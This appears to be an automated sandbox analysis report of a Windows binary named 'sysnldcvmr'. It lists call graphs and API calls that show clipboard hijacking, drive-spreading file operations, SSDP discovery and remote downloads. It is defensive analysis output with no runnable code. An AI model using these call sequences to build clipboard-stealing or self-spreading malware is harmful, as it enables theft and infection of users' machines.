40cae6 5561->5573 5578 40cdc0 5562->5578 5565 40cb0d InterlockedIncrement 5567 40cb17 5565->5567 5566 40b520 18 API calls 5566->5567 5567->5566 5568 40cb40 5567->5568 5571 40cc10 InterlockedDecrement 5567->5571 5574 409fa0 __aligned_recalloc_base 7 API calls 5567->5574 5575 40ccf0 6 API calls 5567->5575 5577 40a1b0 __aligned_recalloc_base 3 API calls 5567->5577 5585 40b570 5567->5585 5600 40aa20 inet_ntoa 5568->5600 5570 40cb4c 5570->5571 5599 40ab40 shutdown closesocket 5571->5599 5573->5303 5574->5567 5575->5567 5577->5567 5579 40cdcd socket 5578->5579 5580 40cde2 htons connect 5579->5580 5581 40ce3f 5579->5581 5580->5581 5582 40ce2a 5580->5582 5581->5579 5583 40cafd 5581->5583 5601 40ab40 shutdown closesocket 5582->5601 5583->5565 5583->5573 5595 40b581 5585->5595 5587 40b59f 5589 40a1b0 __aligned_recalloc_base 3 API calls 5587->5589 5590 40b94f 5589->5590 5590->5567 5591 40b960 26 API calls 5591->5595 5592 40ae80 31 API calls 5592->5595 5595->5587 5595->5591 5595->5592 5596 40b520 18 API calls 5595->5596 5602 40bab0 5595->5602 5609 40b250 EnterCriticalSection 5595->5609 5614 406f30 5595->5614 5619 406e60 5595->5619 5622 406e90 5595->5622 5627 406d60 5595->5627 5596->5595 5599->5573 5600->5570 5601->5583 5603 40bac1 lstrlenA 5602->5603 5604 40c190 7 API calls 5603->5604 5608 40badf 5604->5608 5605 40baeb 5606 40bb6f 5605->5606 5607 40a1b0 __aligned_recalloc_base 3 API calls 5605->5607 5606->5595 5607->5606 5608->5603 5608->5605 5610 40b268 5609->5610 5611 40b2a4 LeaveCriticalSection 5610->5611 5634 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5610->5634 5611->5595 5613 40b293 5613->5611 5635 406ed0 5614->5635 5617 406f7c 5617->5595 5653 406060 EnterCriticalSection 5619->5653 5621 406e82 5621->5595 5623 406ed0 75 API calls 5622->5623 5624 406ea4 5623->5624 5625 40d160 328 API calls 5624->5625 5626 406ec9 5624->5626 5625->5626 5626->5595 5690 405fa0 EnterCriticalSection 5627->5690 5629 406d7a 5633 406dad 5629->5633 5695 406dc0 5629->5695 5632 40a1b0 __aligned_recalloc_base 3 API calls 5632->5633 5633->5595 5634->5613 5638 406ee3 5635->5638 5636 406f20 5636->5617 5639 406f90 5636->5639 5638->5636 5642 405eb0 EnterCriticalSection 5638->5642 5640 40b480 18 API calls 5639->5640 5641 406fd5 5640->5641 5641->5617 5643 40c820 71 API calls 5642->5643 5644 405ece 5643->5644 5645 405f8b LeaveCriticalSection 5644->5645 5646 405ee7 5644->5646 5650 405f08 5644->5650 5645->5638 5647 405ef1 memcpy 5646->5647 5648 405f06 5646->5648 5647->5648 5649 40a1b0 __aligned_recalloc_base 3 API calls 5648->5649 5651 405f88 5649->5651 5650->5648 5652 405f66 memcpy 5650->5652 5651->5645 5652->5648 5678 40c880 5653->5678 5656 4062a3 LeaveCriticalSection 5656->5621 5657 40c820 71 API calls 5658 406099 5657->5658 5658->5656 5659 4061b8 5658->5659 5661 4060f4 memcpy 5658->5661 5660 4061e1 5659->5660 5662 405cf0 68 API calls 5659->5662 5663 40a1b0 __aligned_recalloc_base 3 API calls 5660->5663 5664 40a1b0 __aligned_recalloc_base 3 API calls 5661->5664 5662->5660 5665 406202 5663->5665 5666 406118 5664->5666 5665->5656 5667 406211 CreateFileW 5665->5667 5668 40a220 8 API calls 5666->5668 5667->5656 5669 406234 5667->5669 5670 406128 5668->5670 5673 406251 WriteFile 5669->5673 5674 40628f FlushFileBuffers 5669->5674 5671 40a1b0 __aligned_recalloc_base 3 API calls 5670->5671 5672 40614f 5671->5672 5675 40c190 7 API calls 5672->5675 5673->5669 5674->5656 5676 406185 5675->5676 5677 407310 64 API calls 5676->5677 5677->5659 5681 40bdd0 5678->5681 5682 40bde1 5681->5682 5683 40a220 8 API calls 5682->5683 5684 40bdfb 5682->5684 5685 40bd30 70 API calls 5682->5685 5688 407af0 68 API calls 5682->5688 5689 40be3b memcmp 5682->5689 5683->5682 5686 40a1b0 __aligned_recalloc_base 3 API calls 5684->5686 5685->5682 5687 406082 5686->5687 5687->5656 5687->5657 5688->5682 5689->5682 5689->5684 5691 405fbe 5690->5691 5692 40604a LeaveCriticalSection 5691->5692 5693 40a220 8 API calls 5691->5693 5692->5629 5694 40601c 5693->5694 5694->5692 5696 409fa0 __aligned_recalloc_base 7 API calls 5695->5696 5697 406dd2 memcpy 5696->5697 5698 40b480 18 API calls 5697->5698 5699 406e3c 5698->5699 5700 40a1b0 __aligned_recalloc_base 3 API calls 5699->5700 5701 406da1 5700->5701 5701->5632 5705 407490 5702->5705 5703 4074b8 Sleep 5703->5705 5704 40756a Sleep 5704->5705 5705->5703 5705->5704 5706 4074e7 Sleep wsprintfA DeleteUrlCacheEntry 5705->5706 5708 40eae0 56 API calls 5705->5708 5733 40ea30 InternetOpenA 5706->5733 5708->5705 5710 405889 memset GetModuleHandleW 5709->5710 5711 4058c2 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5710->5711 5711->5711 5712 405900 CreateWindowExW 5711->5712 5713 40592b 5712->5713 5714 40592d GetMessageA 5712->5714 5715 40595f ExitThread 5713->5715 5716 405941 TranslateMessage DispatchMessageA 5714->5716 5717 405957 5714->5717 5716->5714 5717->5710 5717->5715 5740 40e770 CreateFileW 5718->5740 5720 406bf0 5721 406d48 ExitThread 5720->5721 5723 406d38 Sleep 5720->5723 5724 406c29 5720->5724 5743 4063a0 GetLogicalDrives 5720->5743 5723->5720 5749 4062c0 5724->5749 5727 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5728 406cd6 wsprintfW 5727->5728 5729 406ceb wsprintfW 5727->5729 5728->5729 5755 4066b0 _chkstk 5729->5755 5730 406c5b 5734 40ea56 InternetOpenUrlA 5733->5734 5735 40eac8 Sleep 5733->5735 5736 40ea75 HttpQueryInfoA 5734->5736 5737 40eabe InternetCloseHandle 5734->5737 5735->5705 5738 40eab4 InternetCloseHandle 5736->5738 5739 40ea9e 5736->5739 5737->5735 5738->5737 5739->5738 5741 40e7b8 5740->5741 5742 40e79f GetFileSize 5740->5742 5741->5720 5742->5741 5746 4063cd 5743->5746 5744 406446 5744->5720 5745 4063dc RegOpenKeyExW 5745->5746 5747 4063fe RegQueryValueExW 5745->5747 5746->5744 5746->5745 5748 40643a RegCloseKey 5746->5748 5747->5746 5747->5748 5748->5746 5750 406319 5749->5750 5751 4062dc 5749->5751 5750->5727 5750->5730 5792 406320 GetDriveTypeW 5751->5792 5754 40630b lstrcpyW 5754->5750 5756 4066ce 6 API calls 5755->5756 5770 4066c7 5755->5770 5757 406782 5756->5757 5758 4067c4 PathFileExistsW 5756->5758 5759 40e770 2 API calls 5757->5759 5760 406874 PathFileExistsW 5758->5760 5761 4067d9 PathFileExistsW 5758->5761 5764 40678e 5759->5764 5762 406885 5760->5762 5763 4068ca FindFirstFileW 5760->5763 5765 406809 PathFileExistsW 5761->5765 5766 4067ea SetFileAttributesW DeleteFileW 5761->5766 5767 4068a5 5762->5767 5768 40688d 5762->5768 5763->5770 5790 4068f1 5763->5790 5764->5758 5769 4067a5 SetFileAttributesW DeleteFileW 5764->5769 5771 40681a CreateDirectoryW 5765->5771 5772 40683c PathFileExistsW 5765->5772 5766->5765 5775 406460 3 API calls 5767->5775 5797 406460 CoInitialize CoCreateInstance 5768->5797 5769->5758 5770->5730 5771->5772 5777 40682d SetFileAttributesW 5771->5777 5772->5760 5773 40684d CopyFileW 5772->5773 5773->5760 5778 406865 SetFileAttributesW 5773->5778 5779 4068a0 SetFileAttributesW 5775->5779 5776 4069b3 lstrcmpW 5780 4069c9 lstrcmpW 5776->5780 5776->5790 5777->5772 5778->5760 5779->5763 5780->5790 5781 406b8a FindNextFileW 5781->5776 5783 406ba6 FindClose 5781->5783 5783->5770 5784 406a0f lstrcmpiW 5784->5790 5785 406a76 PathMatchSpecW 5786 406a97 wsprintfW SetFileAttributesW DeleteFileW 5785->5786 5785->5790 5786->5790 5787 406af4 PathFileExistsW 5788 406b0a wsprintfW wsprintfW 5787->5788 5787->5790 5789 406b74 MoveFileExW 5788->5789 5788->5790 5789->5781 5790->5776 5790->5781 5790->5784 5790->5785 5790->5787 5801 406570 CreateDirectoryW wsprintfW FindFirstFileW 5790->5801 5793 406348 5792->5793 5796 4062ff 5792->5796 5794 40635c QueryDosDeviceW 5793->5794 5793->5796 5795 406376 StrCmpNW 5794->5795 5794->5796 5795->5796 5796->5750 5796->5754 5798 406496 5797->5798 5800 4064d2 5797->5800 5799 4064a0 wsprintfW 5798->5799 5798->5800 5799->5800 5800->5779 5802 4065c5 lstrcmpW 5801->5802 5803 40669f 5801->5803 5804 4065db lstrcmpW 5802->5804 5809 4065f1 5802->5809 5803->5790 5805 4065f3 wsprintfW wsprintfW 5804->5805 5804->5809 5808 406656 MoveFileExW 5805->5808 5805->5809 5806 40666c FindNextFileW 5806->5802 5807 406688 FindClose RemoveDirectoryW 5806->5807 5807->5803 5808->5806 5809->5806 5810 405970 GetWindowLongW 5811 405994 5810->5811 5812 4059b6 5810->5812 5813 4059a1 5811->5813 5814 405a27 IsClipboardFormatAvailable 5811->5814 5819 405a06 5812->5819 5820 4059ee SetWindowLongW 5812->5820 5821 4059b1 5812->5821 5816 4059c4 SetClipboardViewer SetWindowLongW 5813->5816 5817 4059a7 5813->5817 5815 405a43 IsClipboardFormatAvailable 5814->5815 5823 405a3a 5814->5823 5815->5823 5824 405a58 IsClipboardFormatAvailable 5815->5824 5818 405ba4 DefWindowProcA 5816->5818 5817->5821 5825 405b5d RegisterRawInputDevices ChangeClipboardChain 5817->5825 5819->5821 5822 405a0c SendMessageA 5819->5822 5820->5821 5821->5818 5822->5821 5826 405a75 OpenClipboard 5823->5826 5827 405b3f 5823->5827 5824->5823 5825->5818 5826->5827 5829 405a85 GetClipboardData 5826->5829 5827->5821 5828 405b45 SendMessageA 5827->5828 5828->5821 5829->5821 5830 405a9d GlobalLock 5829->5830 5830->5821 5831 405ab5 5830->5831 5832 405ac8 5831->5832 5833 405ae9 5831->5833 5834 405afe 5832->5834 5835 405ace 5832->5835 5836 405690 13 API calls 5833->5836 5852 4057b0 5834->5852 5837 405ad4 GlobalUnlock CloseClipboard 5835->5837 5846 405570 5835->5846 5836->5837 5837->5827 5841 405b27 5837->5841 5860 404970 lstrlenW 5841->5860 5844 40a1b0 __aligned_recalloc_base 3 API calls 5845 405b3c 5844->5845 5845->5827 5847 40557b 5846->5847 5848 405581 lstrlenW 5847->5848 5849 405594 5847->5849 5850 409fa0 __aligned_recalloc_base 7 API calls 5847->5850 5851 4055b1 lstrcpynW 5847->5851 5848->5847 5848->5849 5849->5837 5850->5847 5851->5847 5851->5849 5857 4057bd 5852->5857 5853 4057c3 lstrlenA 5853->5857 5858 4057d6 5853->5858 5854 405630 2 API calls 5854->5857 5855 409fa0 __aligned_recalloc_base 7 API calls 5855->5857 5857->5853 5857->5854 5857->5855 5857->5858 5859 40a1b0 __aligned_recalloc_base 3 API calls 5857->5859 5894 405760 5857->5894 5858->5837 5859->5857 5866 4049a4 5860->5866 5861 404bee 5861->5844 5862 404c00 5862->5861 5863 404dbb StrStrW 5862->5863 5864 404dd2 StrStrW 5863->5864 5865 404dce 5863->5865 5867 404de5 5864->5867 5868 404de9 StrStrW 5864->5868 5865->5864 5866->5861 5866->5862 5870 404d30 StrStrW 5866->5870 5867->5868 5869 404dfc 5868->5869 5876 404e12 5869->5876 5899 4048a0 lstrlenW 5869->5899 5870->5862 5872 404d58 StrStrW 5870->5872 5872->5862 5873 404d80 StrStrW 5872->5873 5873->5862 5874 40539b StrStrW 5875 4053b7 StrStrW 5874->5875 5881 4053ae StrStrW 5874->5881 5877 4053d3 StrStrW 5875->5877 5875->5881 5876->5861 5876->5874 5876->5881 5877->5881 5879 405470 StrStrW 5882 405483 5879->5882 5883 40548a StrStrW 5879->5883 5880 405469 5880->5879 5881->5879 5881->5880 5882->5883 5884 4054a4 StrStrW 5883->5884 5885 40549d 5883->5885 5886 4054b7 5884->5886 5887 4054be StrStrW 5884->5887 5885->5884 5886->5887 5888 4054d1 5887->5888 5889 4054d8 lstrlenA 5887->5889 5888->5889 5889->5861 5890 4054eb GlobalAlloc 5889->5890 5890->5861 5891 405506 GlobalLock 5890->5891 5891->5861 5892 405519 memcpy GlobalUnlock OpenClipboard 5891->5892 5892->5861 5893 405546 EmptyClipboard SetClipboardData CloseClipboard 5892->5893 5893->5861 5895 40576b 5894->5895 5896 405771 lstrlenA 5895->5896 5897 405630 2 API calls 5895->5897 5898 4057a4 5895->5898 5896->5895 5897->5895 5898->5857 5902 4048c4 5899->5902 5900 404911 iswalpha 5900->5902 5903 40492c iswdigit 5900->5903 5901 40490d 5901->5876 5902->5900 5902->5901 5902->5903 5903->5902 5931 40d4d0 5932 40b570 328 API calls 5931->5932 5933 40d508 5932->5933 5934 40d0d0 5939 401b60 5934->5939 5936 40d0e5 5937 40d104 5936->5937 5938 401b60 16 API calls 5936->5938 5938->5937 5940 401c42 5939->5940 5941 401b70 5939->5941 5940->5936 5941->5940 5942 409d90 7 API calls 5941->5942 5943 401b9d 5942->5943 5943->5940 5944 40a220 8 API calls 5943->5944 5945 401bc9 5944->5945 5946 401be6 5945->5946 5947 401bd6 5945->5947 5949 401ae0 4 API calls 5946->5949 5948 40a1b0 __aligned_recalloc_base 3 API calls 5947->5948 5950 401bdc 5948->5950 5951 401bf3 5949->5951 5950->5936 5952 401c33 5951->5952 5953 401bfc EnterCriticalSection 5951->5953 5956 40a1b0 __aligned_recalloc_base 3 API calls 5952->5956 5954 401c13 5953->5954 5955 401c1f LeaveCriticalSection 5953->5955 5954->5955 5955->5936 5957 401c3c 5956->5957 5958 40a1b0 __aligned_recalloc_base 3 API calls 5957->5958 5958->5940 5959 40ca90 5964 40ad40 5959->5964 5962 40caba 5963 40cad0 328 API calls 5963->5962 5965 40add0 2 API calls 5964->5965 5966 40ad4f 5965->5966 5967 40ad59 5966->5967 5968 40ad5d EnterCriticalSection 5966->5968 5967->5962 5967->5963 5970 40ad7c LeaveCriticalSection 5968->5970 5970->5967 5971 40cf50 5972 40cfbe 5971->5972 5973 40cf66 5971->5973 5973->5972 5974 40cf70 5973->5974 5975 40cfc3 5973->5975 5976 40d013 5973->5976 5980 409d90 7 API calls 5974->5980 5978 40cfe8 5975->5978 5979 40cfdb InterlockedDecrement 5975->5979 5998 40bbc0 5976->5998 5982 40a1b0 __aligned_recalloc_base 3 API calls 5978->5982 5979->5978 5981 40cf7d 5980->5981 5994 4023d0 5981->5994 5984 40cff4 5982->5984 5986 40a1b0 __aligned_recalloc_base 3 API calls 5984->5986 5986->5972 5987 40ad40 4 API calls 5989 40cf9f 5987->5989 5988 40d039 5988->5972 5991 40d071 IsBadReadPtr 5988->5991 5993 40b570 328 API calls 5988->5993 6003 40bcc0 5988->6003 5989->5972 5990 40cfab InterlockedIncrement 5989->5990 5990->5972 5991->5988 5993->5988 5995 402413 5994->5995 5996 4023d9 5994->5996 5995->5987 5996->5995 5997 4023ea InterlockedIncrement 5996->5997 5997->5995 5999 40bbd3 5998->5999 6000 40bbfd memcpy 5998->6000 6001 409fe0 9 API calls 5999->6001 6000->5988 6002 40bbf4 6001->6002 6002->6000 6004 40bce9 6003->6004 6005 40bcde 6003->6005 6004->6005 6006 40bd01 memmove 6004->6006 6005->5988 6006->6005 6046 40ee74 6047 40ee7c 6046->6047 6048 40ef30 6047->6048 6052 40f0b1 6047->6052 6051 40eeb5 6051->6048 6056 40ef9c RtlUnwind 6051->6056 6054 40f0c6 6052->6054 6055 40f0e2 6052->6055 6053 40f151 NtQueryVirtualMemory 6053->6055 6054->6053 6054->6055 6055->6051 6055->6055 6057 40efb4 6056->6057 6057->6051 6007 406c16 6011 406bf8 6007->6011 6008 406d38 Sleep 6008->6011 6009 406c29 6010 4062c0 4 API calls 6009->6010 6015 406c3a 6010->6015 6011->6008 6011->6009 6012 406d48 ExitThread 6011->6012 6013 4063a0 4 API calls 6011->6013 6013->6011 6014 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6016 406cd6 wsprintfW 6014->6016 6017 406ceb wsprintfW 6014->6017 6015->6014 6018 406c5b 6015->6018 6016->6017 6019 4066b0 51 API calls 6017->6019 6019->6018 6058 406a39 6060 4069df 6058->6060 6059 406a0f lstrcmpiW 6059->6060 6060->6059 6061 406b8a FindNextFileW 6060->6061 6062 406a76 PathMatchSpecW 6060->6062 6067 406af4 PathFileExistsW 6060->6067 6071 406570 11 API calls 6060->6071 6063 4069b3 lstrcmpW 6061->6063 6064 406ba6 FindClose 6061->6064 6062->6060 6065 406a97 wsprintfW SetFileAttributesW DeleteFileW 6062->6065 6063->6060 6068 4069c9 lstrcmpW 6063->6068 6066 406bb3 6064->6066 6065->6060 6067->6060 6069 406b0a wsprintfW wsprintfW 6067->6069 6068->6060 6069->6060 6070 406b74 MoveFileExW 6069->6070 6070->6061 6071->6060 6072 40757a ExitThread 6073 40ee7c 6074 40ee9a 6073->6074 6076 40ef30 6073->6076 6075 40f0b1 NtQueryVirtualMemory 6074->6075 6078 40eeb5 6075->6078 6077 40ef9c RtlUnwind 6077->6078 6078->6076 6078->6077 6079 405f7d 6082 405f11 6079->6082 6080 405f7b 6081 40a1b0 __aligned_recalloc_base 3 API calls 6080->6081 6083 405f88 LeaveCriticalSection 6081->6083 6082->6080 6084 405f66 memcpy 6082->6084 6084->6080

                                                                    Executed Functions

                                                                    Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 324 402020-402032 call 409d90 327 402038-402070 GetSystemInfo InitializeCriticalSection CreateEventA 324->327 328 4021aa-4021ae 324->328 329 402076-402089 CreateIoCompletionPort 327->329 330 40219f-4021a8 call 401600 327->330 329->330 331 40208f-402099 call 40d130 329->331 330->328 331->330 336 40209f-4020b7 WSASocketA 331->336 336->330 337 4020bd-402120 setsockopt htons bind 336->337 337->330 338 402126-402138 listen 337->338 338->330 339 40213a-402145 WSACreateEvent 338->339 339->330 340 402147-402157 WSAEventSelect 339->340 340->330 341 402159-40215f 340->341 342 402161-402171 call 40d160 341->342 343 40217f-40218f call 40d160 341->343 346 402176-40217d 342->346 347 402194-40219e 343->347 346->342 346->343
                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                      • Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E
                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                    • htons.WS2_32(?), ref: 00402101
                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                      • Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                      • Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                      • Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                      • Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                    • String ID:
                                                                    • API String ID: 1603358586-0
                                                                    • Opcode ID: 4aaa01092ab68818f2c6086df037ff4d5fe56567f8ac19d07e2acd010698dc1e
                                                                    • Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
                                                                    • Opcode Fuzzy Hash: 4aaa01092ab68818f2c6086df037ff4d5fe56567f8ac19d07e2acd010698dc1e
                                                                    • Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A
                                                                    Function 0040D710 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117networkstringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 402 40d710-40d737 socket 403 40d871-40d875 402->403 404 40d73d-40d805 htons inet_addr setsockopt call 40aa80 bind lstrlenA sendto ioctlsocket 402->404 406 40d877-40d87d 403->406 407 40d87f-40d885 403->407 409 40d80b-40d812 404->409 406->407 410 40d814-40d823 call 40d890 409->410 411 40d865-40d869 call 40ab40 409->411 414 40d828-40d830 410->414 415 40d86e 411->415 416 40d832 414->416 417 40d834-40d863 call 409fe0 414->417 415->403 416->411 417->409
                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                    • htons.WS2_32(0000076C), ref: 0040D760
                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                      • Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
                                                                      • Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                      • Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                      • Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                    • lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                    • sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                      • Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                      • Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                      • Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                      • Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                      • Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                    • String ID: 239.255.255.250
                                                                    • API String ID: 726339449-2186272203
                                                                    • Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                    • Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
                                                                    • Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                    • Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69
                                                                    Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                    • htons.WS2_32(?), ref: 00401508
                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                    • String ID:
                                                                    • API String ID: 4174406920-0
                                                                    • Opcode ID: 7eae0560a4d2d7404a029b5e5367fdda332e0801075591d5afac2db090b1cb88
                                                                    • Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
                                                                    • Opcode Fuzzy Hash: 7eae0560a4d2d7404a029b5e5367fdda332e0801075591d5afac2db090b1cb88
                                                                    • Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A
                                                                    Function 0040CCF0 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040CD02
                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
                                                                    • GetTickCount.KERNEL32 ref: 0040CD74
                                                                    • Sleep.KERNEL32(00000001), ref: 0040CD94
                                                                    • GetTickCount.KERNEL32 ref: 0040CD9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                    • String ID:
                                                                    • API String ID: 107502007-0
                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                    • Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                    • Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95
